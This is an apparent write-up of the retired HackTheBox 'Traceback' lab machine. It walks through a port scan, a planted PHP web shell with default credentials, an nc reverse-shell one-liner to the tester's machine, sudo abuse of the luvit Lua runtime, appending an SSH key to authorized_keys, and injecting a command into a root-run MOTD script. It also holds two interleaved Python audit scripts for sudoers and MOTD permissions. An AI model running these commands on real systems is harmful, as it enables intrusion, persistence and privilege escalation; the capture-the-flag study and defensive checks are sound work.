Hackthebox.eu - Retired - Traceback
Recon
As is my norm, I start with a simple up/down scan on all TCP ports
$ nmap -T4 -p- -oX ./nmapb.xml traceback.htb
Then I convert that to HTML to make it pretty
$ xsltproc ./nmapb.xml -o ./nmapb.html
Just three open ports 22, 80 and 8080
Let's scan again with the -A switch to try and finger OS/Service
$ nmap -T4 -p22,80,8080 -A -oX ./nmapf.xml traceback.htb
Then I convert that to HTML also
$ xsltproc ./nmapf.xml -o ./nmapf.html
Port 22 is a fairly recent OpenSSH
80 is Apache
8080 is something strange…
Let's see what we can see on port 80
Looks like somebody has defaced the site
But they left us a backdoor? I think it might have something to do with port 8080 but let's run dirb just in case
Trying to browse to port 8080 we get nothing
What about this part of our nmap output?
Googling around for http-proxy socks5, I eventually found this page
https://www.systutorials.com/proxy-using-ssh-tunnel/
It talks about setting up an SSH proxy
What happens if we try to SSH into port 80
Cool there is SSH there…
What was the hackers name again?
Oh yeah, it's right there in the screenshot
XH4H
Dirb wasn't very helpful
But this line in the source code looks like a thread we should pull
I popped that into google and found this github
https://github.com/TheBinitGhimire/Web-Shells
I wonder if these shells might be what the hacker meant when they said they left a backdoor
I just copied and pasted each one to see if it was in the root dir…
After almost exhausting the list we got this
Looking at the code for this shell, the default creds are admin/admin
Let's try it
Yup
While I haven't exploited the system yet, let's move over to the exploitation section or I'm going to feel dirty
Exploit
OK, so we got a shell. Cool.
Let's poke around the OS and see what we can find
Here is the bash history for webadmin
Lua
Here is sudo -l
Webadmin can run this luvit application as sysadmin with no password
Let's grab a better shell than this PHP webshell
Let's listen on 5555 on our Kali box
And run mkfifo on the web shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 5555 >/tmp/f
Let's see what that application we found earlier does
$ sudo -u sysadmin /home/sysadmin/luvit
Googling around for luvit lands us here
Using the Node-Style APIs
The luvit CLI tool can be used as a scripting platform just like node. This can be used to run lua scripts as standalone servers, clients, or other tools.
That sounds really interesting. I wonder if we can use a Lua script to get a reverse shell as sysadmin.
The easiest thing I can think of is a Lua script that simply spawns a new shell as sysadmin
I created a Lua script with this inside
os.execute('/bin/sh')
Then used python SimpleHTTPServer and wget to move it over to the traceback
On Kali
/Desktop/HTB/traceback$ python -m SimpleHTTPServer 8080
On traceback
$ wget http://10.10.14.30:8080/Esc.lua
Then we use sudo to call the file Esc.lua as sysadmin
sudo -u sysadmin /home/sysadmin/luvit /tmp/circusmonkey/Esc.lua
Alright alright alright
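The sudo rule above (an interpreter runnable as another user with no password) is the kind of entry a defender should catch before a pentester does. The following audit script is an added example, not code from the writeup; it parses sudoers-style lines such as the one `sudo -l` showed here and flags any command that is itself a scripting runtime or shell. The sample sudoers text is constructed, modelled on the page's result.

```python
import os
import re

# Runtimes that execute caller-supplied code; granting one of these via sudo
# is equivalent to granting a shell as the run-as user (luvit is this box's case).
INTERPRETERS = {
    "luvit", "lua", "python", "python2", "python3", "perl", "ruby", "node",
    "sh", "bash", "dash", "zsh",
}

# user host=(runas[:group]) [TAG: ...] cmd[, cmd...]   (the (runas) part is optional)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def audit_sudoers(text, interpreters=INTERPRETERS):
    """Return one finding per sudoers command that hands out an interpreter or ALL."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            parts = cmd.split()
            if not parts:
                continue
            prog = parts[0]
            if prog == "ALL" or os.path.basename(prog) in interpreters:
                findings.append({
                    "user": m.group("user"), "runas": runas, "cmd": prog,
                    "nopasswd": nopasswd,
                    "severity": "high" if nopasswd else "medium",
                })
    return findings

# Constructed sample sudoers content, modelled on the sudo -l result on the page.
SAMPLE_SUDOERS = """\
Defaults env_reset
webadmin ALL=(sysadmin) NOPASSWD: /home/sysadmin/luvit
alice ALL=(ALL) /usr/bin/systemctl restart nginx
bob ALL=(root) NOPASSWD: /usr/bin/python3, /usr/bin/less
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

On a real host, feed it the output of `sudo -l -U <user>` or the sudoers files themselves; the fix for a hit is to remove the rule or replace the interpreter with a fixed, non-writable wrapper script.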
Let's get our user hash
cat user.txt
c24349701ae38c33ffbf0cceb2c46020
I created a new folder under /tmp (because I'm too lazy to deal with the permissions on the folder we created as the webadmin user)
mkdir /tmp/circusmonkey2
Let's use SimpleHTTPServer to transfer LinEnum.sh over to traceback to see if there are any misconfigurations we can find
We need to give this script execution rights
chmod +x ./LinEnum.sh
This part of the running processes caught my attention
Looks like there is a process running as root that copies everything over from /var/backups/.update-motd.d to /etc/update-motd.d
This looks like a process that is meant to keep the /etc/update-motd.d folder from being messed with.
Every 30 seconds it restores the files to the version that was backed up
MOTD… That brings me back to my net admin days, setting the MOTD banner on Cisco IOS.
MOTD stands for Message of the Day.
This is a message that can be displayed on an SSH or telnet session (among other services). There can be a couple of different banners: a warning banner that is displayed pre-authentication, and another that you see after you authenticate.
Let's check out the folder that is being overwritten
Ooooooohhhhhh the sysadmin group has write access to this….
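The restore job on this box undoes changes but never reports them, and the real weakness is that a non-root group can write to a directory whose scripts run as root at login. The following check is an added example (not from the writeup): it audits ownership and write bits on the MOTD directory and its scripts, and diffs the live scripts against the backup copy so a change is alerted on rather than silently reverted. Paths default to the ones named on the page; `expected_uid` is a parameter so the check can be exercised on a scratch directory.

```python
import hashlib
import os
import stat

MOTD_DIR = "/etc/update-motd.d"              # executed as root by pam_motd at login
BACKUP_DIR = "/var/backups/.update-motd.d"   # the restore source seen on this box

def _sha256(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def audit_motd_dir(path=MOTD_DIR, expected_uid=0):
    """Return (entry, problem) pairs for ownership/permission weaknesses."""
    problems = []

    def check(p, label):
        st = os.lstat(p)
        if stat.S_ISLNK(st.st_mode):              # a symlink can point anywhere writable
            problems.append((label, "is a symlink"))
            return
        if st.st_uid != expected_uid:
            problems.append((label, f"owned by uid {st.st_uid}, expected {expected_uid}"))
        if st.st_mode & stat.S_IWGRP:
            problems.append((label, "group-writable"))
        if st.st_mode & stat.S_IWOTH:
            problems.append((label, "world-writable"))

    check(path, path)                 # a writable directory defeats per-file modes
    for name in sorted(os.listdir(path)):
        check(os.path.join(path, name), name)
    return problems

def changed_since_backup(live_dir=MOTD_DIR, backup_dir=BACKUP_DIR):
    """Names whose live content differs from, or is missing in, the backup copy."""
    changed = []
    for name in sorted(os.listdir(live_dir)):
        live = os.path.join(live_dir, name)
        ref = os.path.join(backup_dir, name)
        if not os.path.isfile(live):
            continue
        if not os.path.isfile(ref) or _sha256(live) != _sha256(ref):
            changed.append(name)
    return changed

if __name__ == "__main__":
    print(audit_motd_dir())
    print(changed_since_backup())
```

Run the two functions from a root cron or timer and forward any non-empty result to your alerting; the permanent fix is `chown root:root` and `chmod 755` on the directory and its scripts.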
Let's check out the 00-header file
See that last part
Welcome to Xh4Hland
Let's try to connect up using SSH to see if that is the message we get when we ssh in
Well that's not the same message….
Maybe our message is behind authentication. Let's put our SSH key in the authorized_keys for sysadmin and see if we get a different message after we gain access.
Let's start by generating our private and public keys
$ ssh-keygen -t rsa
This makes a private and public key for us..
It puts the public key in the directory we ran the command from
Since this is a live box and there are other users trying to root this box.. I don't want to overwrite the authorized_keys file for sysadmin
So let's add some padding to our public key so there is a bit of space between the entries
$ (echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > pubkey.txt
Now we can use >> to append this to the authorized_keys file
On our shell
cd /home/sysadmin/.ssh
echo "
ssh-rsa AA*************************************************************************************************************************************************************************************************************************************** circusmonkey@kali
" >> authorized_keys
This should put our key at the bottom of the authorized_keys file
Now let's try to ssh with our private key
And there is that string we saw in the 00-header file.
Let's edit the file to print out the root flag
cd /etc/update-motd.d
$ echo " cat /root/root.txt " >> 00-header
Then we'll cat the file to make sure it did put our cat in there.
Yup, it's there. Let's open another terminal and try to SSH again
And there is our hash…. Since HTB is now rotating the hashes after every reset, I'm not going to blur out the hash anymore, since it shouldn't work by the time this goes public.
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
c37bcae2b8b1cd4ed4addc68f243e1b0